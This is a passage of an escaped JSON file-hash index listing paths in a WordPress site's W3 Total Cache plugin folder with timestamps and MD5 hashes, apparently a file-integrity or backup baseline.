lib\\/Azure\\/MicrosoftAzureStorage\\/Common\\/Internal\\/ServiceRestProxy.php\":{\"d\":1526741203,\"h\":\"5fbdf69775ea4d5911e95fcb1b8f5ef3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Azure\\/MicrosoftAzureStorage\\/Common\\/Internal\\/RestProxy.php\":{\"d\":1526741203,\"h\":\"88e647f5fb0aa257cf20699fdf5795c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Azure\\/MicrosoftAzureStorage\\/Common\\/Internal\\/InvalidArgumentTypeException.php\":{\"d\":1526741203,\"h\":\"a50c0bad44d90fc09c20cd237c94b48c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Azure\\/MicrosoftAzureStorage\\/Common\\/Internal\\/FilterableService.php\":{\"d\":1526741202,\"h\":\"c227197e89caece0d95cc9cfb4cb9b8a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Azure\\/MicrosoftAzureStorage\\/Common\\/Internal\\/HttpFormatter.php\":{\"d\":1526741203,\"h\":\"13a93aa6a2b7a7eb6f33b8a9f1686460\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Azure\\/MicrosoftAzureStorage\\/Common\\/Internal\\/Validate.php\":{\"d\":1526741203,\"h\":\"b1a8ed46d8a2ae7ae2f746959782cc78\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Azure\\/MicrosoftAzureStorage\\/Common\\/Models\\/ServiceProperties.php\":{\"d\":1526741203,\"h\":\"2c327e7c792a60f4bd8a37b0d74755b2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Azure\\/MicrosoftAzureStorage\\/Common\\/Models\\/Metrics.php\":{\"d\":1526741203,\"h\":\"7bdd05dbf3bb08bfdb6ddb31829e6d66\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Azure\\/MicrosoftAzureStorage\\/Common\\/Models\\/Logging.php\":{\"d\":1526741203,\"h\":\"12b1ade8200d77a6506d727885e7feba\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Azure\\/MicrosoftAzureStorage\\/Common\\/Models\\/GetServicePropertiesResult.php\":{\"d\":1526741203,\"h\":\"88089cfe6d425f01e74b978d023744de\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Azure\\/MicrosoftAzureStorage\\/Common\\/Models\\/RetentionPolicy.php\":{\"d\":1526741203,\"h\":\"6db2c875516ea8715faf8b7f629cfd74\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Azure\\/MicrosoftAzureStorage\\/Common\\/CloudConfigurationManager.php\":{\"d\":1526741203,\"h\":\"73f9a3eaafd3dbab3db7cbc9ca9296c0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Azure\\/MicrosoftAzureStorage\\/Common\\/ServicesBuilder.php\":{\"d\":1526741202,\"h\":\"f50aa61159476a259c0b51d14a7a679d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Azure\\/MicrosoftAzureStorage\\/Common\\/ServiceException.php\":{\"d\":1526741202,\"h\":\"bd5c39f7f3ef817dabd01a77559c95c1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Azure\\/loader.php\":{\"d\":1526741202,\"h\":\"0484c7c950fa5c195cbac0d34d1155af\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Nusoap\\/index.html\":{\"d\":1526741202,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Nusoap\\/class.soap_val.php\":{\"d\":1526741202,\"h\":\"6c3978e769cba458fa3ef9baf9324eaf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Nusoap\\/nusoap.php\":{\"d\":1526741202,\"h\":\"ad62289c352eee409a21f3276fbefcf3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Nusoap\\/class.soap_fault.php\":{\"d\":1526741202,\"h\":\"04ad073798ce71bcda83cf858fe3d3e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Nusoap\\/class.soap_parser.php\":{\"d\":1526741202,\"h\":\"8a29b5b261ad04313fefbfd2428cc1cd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Nusoap\\/class.xmlschema.php\":{\"d\":1526741202,\"h\":\"3143a5dca266f6b807b6601770f8e6e1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Nusoap\\/class.soap_transport_http.php\":{\"d\":1526741202,\"h\":\"6de2a344df78f2f62eca846ec4bdcb93\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Nusoap\\/class.nusoap_base.php\":{\"d\":1526741202,\"h\":\"882bd26c7b714903c8e7285815d1b364\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Nusoap\\/class.wsdlcache.php\":{\"d\":1526741202,\"h\":\"870f48e863ac355182347a89bf7565f1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Nusoap\\/class.wsdl.php\":{\"d\":1526741202,\"h\":\"db1c8c96c56050a4311428ab97bc982e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Nusoap\\/class.soapclient.php\":{\"d\":1526741202,\"h\":\"acbb403ebedcbd6dd7bd4bf4457f55f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/NewRelic\\/NewRelicAPI.php\":{\"d\":1526741202,\"h\":\"1fe8534534eff0065d9325a9496a0175\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/NewRelic\\/NewRelicWrapper.php\":{\"d\":1526741202,\"h\":\"7f69b2a419bac1422641972d2cc3c92b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/SNS\\/services\\/MessageValidator\\/Message.php\":{\"d\":1526741202,\"h\":\"254ec097174d92659d4b6a086d60a4d6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/SNS\\/services\\/MessageValidator\\/sns-exceptions.php\":{\"d\":1526741202,\"h\":\"3bdec9772c613c46b5b21c24b68feca5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/SNS\\/services\\/MessageValidator\\/MessageValidator.php\":{\"d\":1526741202,\"h\":\"9d32f2a9ef2c08b7860ae3a8f5723948\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/SNS\\/services\\/sns.class.php\":{\"d\":1526741202,\"h\":\"cb3d8df826476829c357ec35bb585469\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/SNS\\/utilities\\/response.class.php\":{\"d\":1526741202,\"h\":\"128a6eff75168fbcddbb1872aa46088d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/SNS\\/utilities\\/simplexml.class.php\":{\"d\":1526741202,\"h\":\"e02af3baf386f4aa9effd3b1c85e1c6d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/SNS\\/utilities\\/utilities.class.php\":{\"d\":1526741202,\"h\":\"dae2d6836f0866237d5c75161227a459\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/SNS\\/utilities\\/request.class.php\":{\"d\":1526741202,\"h\":\"21146811c1c182bb1f3db4a36631305c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/SNS\\/lib\\/requestcore\\/README.md\":{\"d\":1526741202,\"h\":\"702485f100351d8dcc1346d087d09656\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/SNS\\/lib\\/requestcore\\/cacert.pem\":{\"d\":1526741202,\"h\":\"4e0c8fcca8148533e6723f94463a3c73\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/SNS\\/lib\\/requestcore\\/requestcore.class.php\":{\"d\":1526741202,\"h\":\"84345c7421c25a284076ba6f5da25888\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/SNS\\/lib\\/requestcore\\/LICENSE\":{\"d\":1526741202,\"h\":\"70f142181074f83b33d258164c008cd9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/SNS\\/sdk.class.php\":{\"d\":1526741202,\"h\":\"21427bc7a1908a66e46d6d2802d8a09a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/SNS\\/README.md\":{\"d\":1526741202,\"h\":\"5ebb7e264b1131f56b91dde12f3ca3a6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/Db\\/mssql.php\":{\"d\":1526741202,\"h\":\"25d5e5d612b502ed6898a618282818a9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/CSSTidy\\/index.html\":{\"d\":1526741202,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/CSSTidy\\/class.csstidy_print.php\":{\"d\":1526741202,\"h\":\"faf14903abf994a296379891599dd45c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/CSSTidy\\/class.csstidy.php\":{\"d\":1526741202,\"h\":\"0fb1228139af4489b435043fbe930789\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/CSSTidy\\/data.inc.php\":{\"d\":1526741202,\"h\":\"6275796afaa97050f62af0704a55eb19\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/CSSTidy\\/class.csstidy_optimise.php\":{\"d\":1526741202,\"h\":\"308455f41e1b1738bc803a4f8405b4da\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/index.html\":{\"d\":1526741202,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/lib\\/S3.php\":{\"d\":1526741202,\"h\":\"dd7b1dfda8eb5e1e3319838f2a5a2dab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/js\\/popup.js\":{\"d\":1526741203,\"h\":\"8270e575e63c8c4b0eb02ef29c64854d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/js\\/index.html\":{\"d\":1526741203,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/js\\/jquery.masonry.min.js\":{\"d\":1526741203,\"h\":\"a6b726ee7fce43453a6eb25e8a1cb819\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/js\\/metadata.js\":{\"d\":1526741203,\"h\":\"47185fe908ef602b79b82e0705aa0804\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/js\\/lightbox.js\":{\"d\":1526741203,\"h\":\"c4b69a6ef9f9eb64bef286bd9d8a207b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/js\\/options.js\":{\"d\":1526741203,\"h\":\"8a3c097baaaaa11897ec901eda23e770\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/js\\/widget.js\":{\"d\":1526741203,\"h\":\"338d6442b4dde231d62597ea8ed04c01\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/img\\/index.html\":{\"d\":1526741203,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/css\\/index.html\":{\"d\":1526741203,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/css\\/widget.css\":{\"d\":1526741203,\"h\":\"351d5cad579743205bb14737986fad8e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/css\\/options.css\":{\"d\":1526741203,\"h\":\"698ba78ed5b649f08c4cef1565d1a7c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/css\\/lightbox.css\":{\"d\":1526741203,\"h\":\"a8e2e52042d1f066671952f7b245c784\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/css\\/popup.css\":{\"d\":1526741203,\"h\":\"34042fb7d3b18ac179476014ba863b44\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/css\\/error.css\":{\"d\":1526741203,\"h\":\"271d7040e01a1de4c7cb3a165b6f7bec\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/index.html\":{\"d\":1526741203,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/opcache.php\":{\"d\":1526741203,\"h\":\"96129811a845a9cbf1add5aae88c181e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/pub\\/sns.php\":{\"d\":1526741203,\"h\":\"064abde5bcf4ab4d5c46049b16d73c36\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_GeneralPage_View_ShowSupportUs.js\":{\"d\":1526741203,\"h\":\"5a480712505b9bb3280221b5987daf2e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Enterprise_CacheFlush_MakeSnsEvent.php\":{\"d\":1526741203,\"h\":\"e1b67492acfa0dec89a6979709b2dfa9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/UsageStatistics_Widget_View.php\":{\"d\":1526741203,\"h\":\"c6212248518edb849637254d17dd2b5b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_Ftp.php\":{\"d\":1526741203,\"h\":\"e34a2b31e775324e5c177bbc7518b84c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Mobile_Page_UserAgentGroups.php\":{\"d\":1526741203,\"h\":\"a8bcdd5c550dfdf476612a7557bf2367\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Support_Page_View_PageContent.php\":{\"d\":1526741203,\"h\":\"ac3bb40bc4d9fc2d7bd54fc069754ff0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_Environment_Exceptions.php\":{\"d\":1526741203,\"h\":\"2d5055484d39fa64ba764089cb13a2b1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_Plugin_Admin_View_Faq.php\":{\"d\":1526741203,\"h\":\"ec0a331bf1838da58286ebc27b4ba443\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_StackPath_Page.php\":{\"d\":1526741203,\"h\":\"22103001ad92d7c854348731be6c06a8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_LimeLight_Popup_View_Intro.php\":{\"d\":1526741203,\"h\":\"9562a7c1caee82f0681996b40ad382f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_ConfigLabel.php\":{\"d\":1526741203,\"h\":\"cb53f4a668d17f25b107bbadbebaf375\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_Swarmify_Widget.php\":{\"d\":1526741203,\"h\":\"c560ca42682c0e105387c2fd75378ce7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Minify_GeneralPage_View_ShowHelpForce.js\":{\"d\":1526741203,\"h\":\"7d788d387252f324cc43f81bd302f0cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/PgCache_Plugin.php\":{\"d\":1526741203,\"h\":\"eca52a94f7d802b5c264495b4ad4e556\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCdn_Popup_View_Service_Actualize.php\":{\"d\":1526741203,\"h\":\"399d4eac0dfea98cf60b2ec67881b8c3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_Theme.php\":{\"d\":1526741203,\"h\":\"c8ebd29c760d1e93c29a544a38577b53\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_Plugin_WidgetNews.php\":{\"d\":1526741203,\"h\":\"41f0ae290cfaaea28ac5a861a2c2ae83\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_CacheFlush.php\":{\"d\":1526741203,\"h\":\"b266c0a2dda504fde21af81d0d2744cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/w3-total-cache.php\":{\"d\":1526741202,\"h\":\"06732dc666fb4ea1a846d820e7c91ffd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache_Eaccelerator.php\":{\"d\":1526741203,\"h\":\"5f9e0ee38afc30ee1242842180ab7f9c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/UsageStatistics_View_General.php\":{\"d\":1526741203,\"h\":\"92c6414ab7d8240792e552a9f43ba0e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Highwinds_Page.php\":{\"d\":1526741203,\"h\":\"0db3deaee3cd1c847f13c1d9343ac9f8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_RuleSnippet.php\":{\"d\":1526741203,\"h\":\"4894e8cd6692fc2604c2fe8ec289146d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/PgCache_Page.php\":{\"d\":1526741203,\"h\":\"565f6e20399123d856ef394034cda4f7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/index.html\":{\"d\":1526741203,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_GeneralPage.php\":{\"d\":1526741203,\"h\":\"37c1a0ec36bbf6a83cc23059a1743a14\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"949a3a96e00e29733458be4bb2867b8b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_Plugin_AdminNotifications.php\":{\"d\":1526741203,\"h\":\"aa2e4b397c94f372d677a025a5046ba4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_AdminActions_Config.php\":{\"d\":1526741203,\"h\":\"87fa26056df60041ece39322d43c8904\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_StackPath_Popup_View_Zones.php\":{\"d\":1526741203,\"h\":\"0146f63ee8f66c7585f153948cf6e837\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_WpFile_FilesystemRmException.php\":{\"d\":1526741203,\"h\":\"3001a52d12748c1ecdc7f3abbfc41d29\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/ConfigKeys.php\":{\"d\":1526741203,\"h\":\"78d41181622e5e295c4e95970254a7d3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_MaxCdn_Popup_View_Zones.php\":{\"d\":1526741203,\"h\":\"52d7a16d6cd681b0c79d8b0d72917b89\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_Debug.php\":{\"d\":1526741203,\"h\":\"0ac7cab0a10f081d5c74c2a51d81c37b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_StackPath_Widget_View.js\":{\"d\":1526741203,\"h\":\"545545d098661d09fc1fb4869d23ca80\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCdn_Popup_View_Intro.php\":{\"d\":1526741203,\"h\":\"a7e68cad3f1113114bbeba1022f2a200\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCdn_Popup_View_Regions.php\":{\"d\":1526741203,\"h\":\"833ef6c237b6930acbabc7c93ea80e0c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_GoogleDrive.php\":{\"d\":1526741203,\"h\":\"501b2776ac688a0361c6f15cdfcaa4c1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Minify_Plugin.php\":{\"d\":1526741203,\"h\":\"67294b975a8d9369688a790899847b5c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/readme.txt\":{\"d\":1526741203,\"h\":\"a7253ee8e27c19bc6620ae89f0eebfcd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CacheFlush.php\":{\"d\":1526741203,\"h\":\"72c5cab5ea0d4235164b2b93a8c92820\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_FeedBurner_Environment.php\":{\"d\":1526741203,\"h\":\"bb44605f94ce7b8927d32c55e1e800e0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpace_Api_Cdn.php\":{\"d\":1526741203,\"h\":\"91e81d135ea1affa1ce1f0500f7e02b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_Environment.php\":{\"d\":1526741203,\"h\":\"894b9c45d22b7d3eae1cad071eda522b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_LimeLight_Api.php\":{\"d\":1526741203,\"h\":\"2207bb257e93268eac6b5113b155af43\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_Plugin.php\":{\"d\":1526741203,\"h\":\"e4dafd5a47d0f3564b2914577427cc83\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/BrowserCache_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"570f959bb65737651d3759e8d48b6a70\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/DbCache_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"0e75efc720cd029327a29d30c0c07156\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_CloudFront_Api.php\":{\"d\":1526741203,\"h\":\"eb27068f14e42256a00094e50135aaa4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_Genesis_Plugin.php\":{\"d\":1526741203,\"h\":\"1b89566e62683d9f58e50fabac351412\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/ConfigUtil.php\":{\"d\":1526741203,\"h\":\"47234b997470a29e26ee3bc6844f71e9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_Installed.php\":{\"d\":1526741203,\"h\":\"b1204d653890c78beb2f8b424a54f4b4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_MaxCdn_Page.php\":{\"d\":1526741203,\"h\":\"6e0e2178a0e33bb603ddd52a3c728870\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache_File_Cleaner.php\":{\"d\":1526741203,\"h\":\"474f19769ea25d73b30d906485dc70cc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/UsageStatistics_Widget_View.js\":{\"d\":1526741203,\"h\":\"571544bd88304acfcf684b7f28c4c7fe\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Root_AdminActivation.php\":{\"d\":1526741203,\"h\":\"f3658859b044117116c210a4f8971ad8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_Mirror_MaxCdn.php\":{\"d\":1526741203,\"h\":\"ee30d16c569664e86f3634aad4d2f695\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_Base.php\":{\"d\":1526741203,\"h\":\"e6b8aaed1465d0a35add945f530a4dc2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Popup_View_ListApplications.php\":{\"d\":1526741203,\"h\":\"8226c6f4021de15de0f0f1e8d48d9dfd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_LimeLight_Page_View.js\":{\"d\":1526741203,\"h\":\"145dc30b5e71ebccbb4e68f5a5aadb31\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Minify_Page.php\":{\"d\":1526741203,\"h\":\"72de8e11184526b3336e31fa789767aa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Widget_View.css\":{\"d\":1526741203,\"h\":\"79e1472533e7358158f1cbfd95d78d5d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_Swarmify_Page.php\":{\"d\":1526741203,\"h\":\"d6903824edcd676c2310a9c9eb88f79d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_WidgetServices_View.php\":{\"d\":1526741203,\"h\":\"ec5685f64ea897f36f33427d96610225\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Highwinds_Widget_View.css\":{\"d\":1526741203,\"h\":\"39db6fdafc7f117af12a3bb1bc440542\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Api.php\":{\"d\":1526741203,\"h\":\"7b7251820999762db2de77a354b3bb85\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Plugin.php\":{\"d\":1526741203,\"h\":\"b754d4bc9d47d36f4c21bb93f1e450ad\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_AdminActions_Flush.php\":{\"